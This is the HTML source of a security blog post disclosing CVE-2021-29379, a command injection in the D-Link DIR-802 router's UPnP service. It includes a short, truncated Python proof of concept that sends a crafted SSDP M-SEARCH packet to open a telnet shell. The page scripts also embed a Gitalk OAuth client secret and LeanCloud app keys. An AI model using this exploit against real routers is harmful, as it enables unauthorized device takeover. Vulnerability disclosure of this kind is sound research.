Cool-Y.github.io/2021/03/02/DIR-802-OS-Command-Injection/index.html
2021-05-21 15:35:38 +08:00

1154 lines
31 KiB
HTML
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<!DOCTYPE html>
<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">
<script src="/lib/pace/pace.min.js?v=1.0.2"></script>
<link href="/lib/pace/pace-theme-center-atom.min.css?v=1.0.2" rel="stylesheet">
<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
<link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
<link rel="apple-touch-icon" sizes="180x180" href="/images/hackerrank.png?v=5.1.4">
<link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
<link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
<link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
<meta name="keywords" content="D-LINK,UPnP,固件模拟,">
<link rel="alternate" href="/atom.xml" title="混元霹雳手" type="application/atom+xml">
<meta name="description" content="提交个漏洞">
<meta name="keywords" content="D-LINK,UPnP,固件模拟">
<meta property="og:type" content="article">
<meta property="og:title" content="DIR-802 OS Command Injection">
<meta property="og:url" content="https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/index.html">
<meta property="og:site_name" content="混元霹雳手">
<meta property="og:description" content="提交个漏洞">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1614665628/cve/carbon.png">
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1614665899/cve/carbon_1.png">
<meta property="og:updated_time" content="2021-04-12T05:07:52.191Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="DIR-802 OS Command Injection">
<meta name="twitter:description" content="提交个漏洞">
<meta name="twitter:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1614665628/cve/carbon.png">
<script type="text/javascript" id="hexo.configurations">
var NexT = window.NexT || {};
var CONFIG = {
root: '/',
scheme: 'Muse',
version: '5.1.4',
sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":true,"onmobile":true},
fancybox: true,
tabs: true,
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
duoshuo: {
userId: '0',
author: '博主'
},
algolia: {
applicationID: '',
apiKey: '',
indexName: '',
hits: {"per_page":10},
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
}
};
</script>
<link rel="canonical" href="https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/">
<title>DIR-802 OS Command Injection | 混元霹雳手</title>
</head>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
<div class="container sidebar-position-left page-post-detail">
<div class="headband"></div>
<header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-wrapper">
<div class="site-meta ">
<div class="custom-logo-site-title">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<span class="site-title">混元霹雳手</span>
<span class="logo-line-after"><i></i></span>
</a>
</div>
<p class="site-subtitle">Battle⚔ 2 the world🌎</p>
</div>
<div class="site-nav-toggle">
<button>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
</button>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section">
<i class="menu-item-icon fa fa-fw fa-home"></i> <br>
首页
</a>
</li>
<li class="menu-item menu-item-about">
<a href="/about/" rel="section">
<i class="menu-item-icon fa fa-fw fa-user"></i> <br>
关于
</a>
</li>
<li class="menu-item menu-item-tags">
<a href="/tags/" rel="section">
<i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
标签
</a>
</li>
<li class="menu-item menu-item-categories">
<a href="/categories/" rel="section">
<i class="menu-item-icon fa fa-fw fa-th"></i> <br>
分类
</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section">
<i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
归档
</a>
</li>
<li class="menu-item menu-item-bookmarks">
<a href="/bookmarks/" rel="section">
<i class="menu-item-icon fa fa-fw fa-map"></i> <br>
书签
</a>
</li>
<li class="menu-item menu-item-album">
<a href="/album/" rel="section">
<i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br>
相簿
</a>
</li>
</ul>
</nav>
</div>
</header>
<main id="main" class="main">
<div class="main-inner">
<div class="content-wrap">
<div id="content" class="content">
<div id="posts" class="posts-expand">
<article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
<div class="post-block">
<link itemprop="mainEntityOfPage" href="https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="name" content="Cool-Y">
<meta itemprop="description" content>
<meta itemprop="image" content="/images/avatar.png">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="混元霹雳手">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">DIR-802 OS Command Injection</h1>
<div class="post-meta">
<span class="post-time">
<span class="post-meta-item-icon">
<i class="fa fa-calendar-o"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建于" itemprop="dateCreated datePublished" datetime="2021-03-02T13:36:32+08:00">
2021-03-02
</time>
</span>
<span class="post-category">
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-folder-o"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/IOT/" itemprop="url" rel="index">
<span itemprop="name">IOT</span>
</a>
</span>
</span>
<span id="/2021/03/02/DIR-802-OS-Command-Injection/" class="leancloud_visitors" data-flag-title="DIR-802 OS Command Injection">
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-eye"></i>
</span>
<span class="post-meta-item-text">阅读次数&#58;</span>
<span class="leancloud-visitors-count"></span>
</span>
<div class="post-wordcount">
<span class="post-meta-item-icon">
<i class="fa fa-file-word-o"></i>
</span>
<span title="字数统计">
384 字
</span>
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-clock-o"></i>
</span>
<span title="阅读时长">
1 分钟
</span>
</div>
<div class="post-description">
提交个漏洞
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<h3 id="D-LINK-DIR-802-命令注入漏洞"><a href="#D-LINK-DIR-802-命令注入漏洞" class="headerlink" title="D-LINK DIR-802 命令注入漏洞"></a>D-LINK DIR-802 命令注入漏洞</h3><blockquote>
<p>by Cool</p>
</blockquote>
<h4 id="漏洞已提交厂商"><a href="#漏洞已提交厂商" class="headerlink" title="漏洞已提交厂商"></a>漏洞已提交厂商</h4><p><a href="https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10206" target="_blank" rel="noopener">https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10206</a><br><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29379" target="_blank" rel="noopener">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29379</a></p>
<h4 id="漏洞类型"><a href="#漏洞类型" class="headerlink" title="漏洞类型"></a>漏洞类型</h4><p>CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)</p>
<h4 id="受影响设备及软件版本"><a href="#受影响设备及软件版本" class="headerlink" title="受影响设备及软件版本"></a>受影响设备及软件版本</h4><p>DIR-802 hardware revision Ax before v1.00b05<br><a href="https://pmdap.dlink.com.tw/PMD/GetAgileFile?itemNumber=FIR1300450&amp;fileName=DIR802_FW100b05.zip&amp;fileSize=6163759.0" target="_blank" rel="noopener">https://pmdap.dlink.com.tw/PMD/GetAgileFile?itemNumber=FIR1300450&amp;fileName=DIR802_FW100b05.zip&amp;fileSize=6163759.0</a>;</p>
<h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>漏洞概要</h4><p>DIR-802中存在一个命令注入漏洞攻击者可以通过精心制作的M-SEARCH数据包向UPnP注入任意命令。</p>
<h4 id="漏洞详情"><a href="#漏洞详情" class="headerlink" title="漏洞详情"></a>漏洞详情</h4><p>与CVE-2020-15893相似在固件版本v-1.00b05之前的D-Link DIR-802 A1上发现了一个问题。默认情况下端口1900上启用了通用即插即用UPnP。攻击者可以通过将有效负载注入SSDP M-SEARCH发现数据包的“搜索目标”ST字段来执行命令注入。</p>
<h4 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># coding: utf-8</span></span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line">buf = <span class="string">'M-SEARCH * HTTP/1.1\r\nHOST:192.168.0.1:1900\r\nST:urn:schemas-upnp-org:service</span></span><br><span class="line"><span class="string">s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</span></span><br><span class="line"><span class="string">s.connect(("192.168.0.1", 1900))</span></span><br><span class="line"><span class="string">s.send(buf)</span></span><br><span class="line"><span class="string">s.close()</span></span><br></pre></td></tr></table></figure>
<h4 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h4><p>使用firmadyne进行固件模拟运行UPnP服务<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1614665628/cve/carbon.png"></p>
<p>攻击者可以是连接到路由器局域网内并且能够向UPnP端口发送请求的任何人。可以通过编写简单的python脚本将精心制作的数据包发送到特定的upnp端口该脚本随后将作为精心制作的请求的一部分执行提供的命令。共享的POC将打开端口8089上的telnet服务。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1614665899/cve/carbon_1.png"></p>
</div>
<div>
<div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
<div>您的支持将鼓励我继续创作!</div>
<button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
<span>打赏</span>
</button>
<div id="QR" style="display: none;">
<div id="wechat" style="display: inline-block">
<img id="wechat_qr" src="/images/Wechatpay.png" alt="Cool-Y 微信支付">
<p>微信支付</p>
</div>
<div id="alipay" style="display: inline-block">
<img id="alipay_qr" src="/images/Alipay.png" alt="Cool-Y 支付宝">
<p>支付宝</p>
</div>
</div>
</div>
</div>
<div>
<ul class="post-copyright">
<li class="post-copyright-author">
<strong>本文作者:</strong>
Cool-Y
</li>
<li class="post-copyright-link">
<strong>本文链接:</strong>
<a href="https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/" title="DIR-802 OS Command Injection">https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/</a>
</li>
<li class="post-copyright-license">
<strong>版权声明: </strong>
本博客所有文章除特别声明外,均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处!
</li>
</ul>
</div>
<footer class="post-footer">
<div class="post-tags">
<a href="/tags/D-LINK/" rel="tag"># D-LINK</a>
<a href="/tags/UPnP/" rel="tag"># UPnP</a>
<a href="/tags/固件模拟/" rel="tag"># 固件模拟</a>
</div>
<div class="post-widgets">
<div id="needsharebutton-postbottom">
<span class="btn">
<i class="fa fa-share-alt" aria-hidden="true"></i>
</span>
</div>
</div>
<div class="post-nav">
<div class="post-nav-next post-nav-item">
<a href="/2021/01/08/nvram-config/" rel="next" title="自动化获取nvram配置">
<i class="fa fa-chevron-left"></i> 自动化获取nvram配置
</a>
</div>
<span class="post-nav-divider"></span>
<div class="post-nav-prev post-nav-item">
<a href="/2021/04/10/vm-escape1/" rel="prev" title="VM escape-QEMU Case Study">
VM escape-QEMU Case Study <i class="fa fa-chevron-right"></i>
</a>
</div>
</div>
</footer>
</div>
</article>
<div class="post-spread">
</div>
</div>
</div>
<div class="comments" id="comments">
<div id="gitalk-container"></div>
</div>
</div>
<div class="sidebar-toggle">
<div class="sidebar-toggle-line-wrap">
<span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
</div>
</div>
<aside id="sidebar" class="sidebar">
<div id="sidebar-dimmer"></div>
<div class="sidebar-inner">
<ul class="sidebar-nav motion-element">
<li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
文章目录
</li>
<li class="sidebar-nav-overview" data-target="site-overview-wrap">
站点概览
</li>
</ul>
<section class="site-overview-wrap sidebar-panel">
<div class="site-overview">
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
<img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
<p class="site-author-name" itemprop="name">Cool-Y</p>
<p class="site-description motion-element" itemprop="description">Juice is temporary but Sauce is forever</p>
</div>
<nav class="site-state motion-element">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">31</span>
<span class="site-state-item-name">日志</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<a href="/categories/index.html">
<span class="site-state-item-count">7</span>
<span class="site-state-item-name">分类</span>
</a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/index.html">
<span class="site-state-item-count">55</span>
<span class="site-state-item-name">标签</span>
</a>
</div>
</nav>
<div class="feed-link motion-element">
<a href="/atom.xml" rel="alternate">
<i class="fa fa-rss"></i>
RSS
</a>
</div>
<div class="links-of-author motion-element">
<span class="links-of-author-item">
<a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
<i class="fa fa-fw fa-github"></i>GitHub</a>
</span>
<span class="links-of-author-item">
<a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
<i class="fa fa-fw fa-envelope"></i>E-Mail</a>
</span>
<span class="links-of-author-item">
<a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
<i class="fa fa-fw fa-instagram"></i>Instagram</a>
</span>
</div>
<div id="music163player">
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="110" src="//music.163.com/outchain/player?type=4&id=334277093&auto=1&height=90"></iframe>
</div>
</div>
</section>
<!--noindex-->
<section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
<div class="post-toc">
<div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#D-LINK-DIR-802-命令注入漏洞"><span class="nav-text">D-LINK DIR-802 命令注入漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞已提交厂商"><span class="nav-text">漏洞已提交厂商</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞类型"><span class="nav-text">漏洞类型</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#受影响设备及软件版本"><span class="nav-text">受影响设备及软件版本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞概要"><span class="nav-text">漏洞概要</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞详情"><span class="nav-text">漏洞详情</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#POC"><span class="nav-text">POC</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞复现"><span class="nav-text">漏洞复现</span></a></li></ol></li></ol></div>
</div>
</section>
<!--/noindex-->
</div>
</aside>
</div>
</main>
<footer id="footer" class="footer">
<div class="footer-inner">
<div class="copyright">&copy; 2019 &mdash; <span itemprop="copyrightYear">2021</span>
<span class="with-love">
<i class="fa fa-user"></i>
</span>
<span class="author" itemprop="copyrightHolder">Cool-Y</span>
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-area-chart"></i>
</span>
<span title="Site words total count">105.1k</span>
</div>
<div class="powered-by"><a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
<div class="busuanzi-count">
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span class="site-uv">
<i class="fa fa-user"></i>
<span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
</span>
<span class="site-pv">
<i class="fa fa-eye"></i>
<span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
</span>
</div>
</div>
</footer>
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
<span id="scrollpercent"><span>0</span>%</span>
</div>
<div id="needsharebutton-float">
<span class="btn">
<i class="fa fa-share-alt" aria-hidden="true"></i>
</span>
</div>
</div>
<script type="text/javascript">
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
window.Promise = null;
}
</script>
<script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
<script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
<script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
<script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
<script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
<script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
<!-- LOCAL: You can save these files to your site and update links -->
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
<!-- END LOCAL -->
<script type="text/javascript">
function renderGitalk(){
var gitalk = new Gitalk({
owner: 'Cool-Y',
repo: 'gitment-comments',
clientID: '180955a2c3ae3d966d9a',
clientSecret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
admin: 'Cool-Y',
id: decodeURI(location.pathname),
distractionFreeMode: 'true'
});
gitalk.render('gitalk-container');
}
renderGitalk();
</script>
<script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
<script>AV.initialize("CnxMogaLcXQrm9Q03lF8XH7j-gzGzoHsz", "EHqNuJ6AYvuHnY6bN6w2SMXl");</script>
<script>
function showTime(Counter) {
var query = new AV.Query(Counter);
var entries = [];
var $visitors = $(".leancloud_visitors");
$visitors.each(function () {
entries.push( $(this).attr("id").trim() );
});
query.containedIn('url', entries);
query.find()
.done(function (results) {
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
if (results.length === 0) {
$visitors.find(COUNT_CONTAINER_REF).text(0);
return;
}
for (var i = 0; i < results.length; i++) {
var item = results[i];
var url = item.get('url');
var time = item.get('time');
var element = document.getElementById(url);
$(element).find(COUNT_CONTAINER_REF).text(time);
}
for(var i = 0; i < entries.length; i++) {
var url = entries[i];
var element = document.getElementById(url);
var countSpan = $(element).find(COUNT_CONTAINER_REF);
if( countSpan.text() == '') {
countSpan.text(0);
}
}
})
.fail(function (object, error) {
console.log("Error: " + error.code + " " + error.message);
});
}
function addCount(Counter) {
var $visitors = $(".leancloud_visitors");
var url = $visitors.attr('id').trim();
var title = $visitors.attr('data-flag-title').trim();
var query = new AV.Query(Counter);
query.equalTo("url", url);
query.find({
success: function(results) {
if (results.length > 0) {
var counter = results[0];
counter.fetchWhenSave(true);
counter.increment("time");
counter.save(null, {
success: function(counter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(counter.get('time'));
},
error: function(counter, error) {
console.log('Failed to save Visitor num, with error message: ' + error.message);
}
});
} else {
var newcounter = new Counter();
/* Set ACL */
var acl = new AV.ACL();
acl.setPublicReadAccess(true);
acl.setPublicWriteAccess(true);
newcounter.setACL(acl);
/* End Set ACL */
newcounter.set("title", title);
newcounter.set("url", url);
newcounter.set("time", 1);
newcounter.save(null, {
success: function(newcounter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
},
error: function(newcounter, error) {
console.log('Failed to create');
}
});
}
},
error: function(error) {
console.log('Error:' + error.code + " " + error.message);
}
});
}
$(function() {
var Counter = AV.Object.extend("Counter");
if ($('.leancloud_visitors').length == 1) {
addCount(Counter);
} else if ($('.post-title-link').length > 1) {
showTime(Counter);
}
});
</script>
<script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
<link rel="stylesheet" href="/lib/needsharebutton/needsharebutton.css">
<script src="/lib/needsharebutton/needsharebutton.js"></script>
<script>
pbOptions = {};
pbOptions.iconStyle = "box";
pbOptions.boxForm = "horizontal";
pbOptions.position = "bottomCenter";
pbOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
new needShareButton('#needsharebutton-postbottom', pbOptions);
flOptions = {};
flOptions.iconStyle = "box";
flOptions.boxForm = "horizontal";
flOptions.position = "middleRight";
flOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
new needShareButton('#needsharebutton-float', flOptions);
</script>
<script type="text/javascript" src="/js/src/js.cookie.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/scroll-cookie.js?v=5.1.4"></script>
</body>
</html>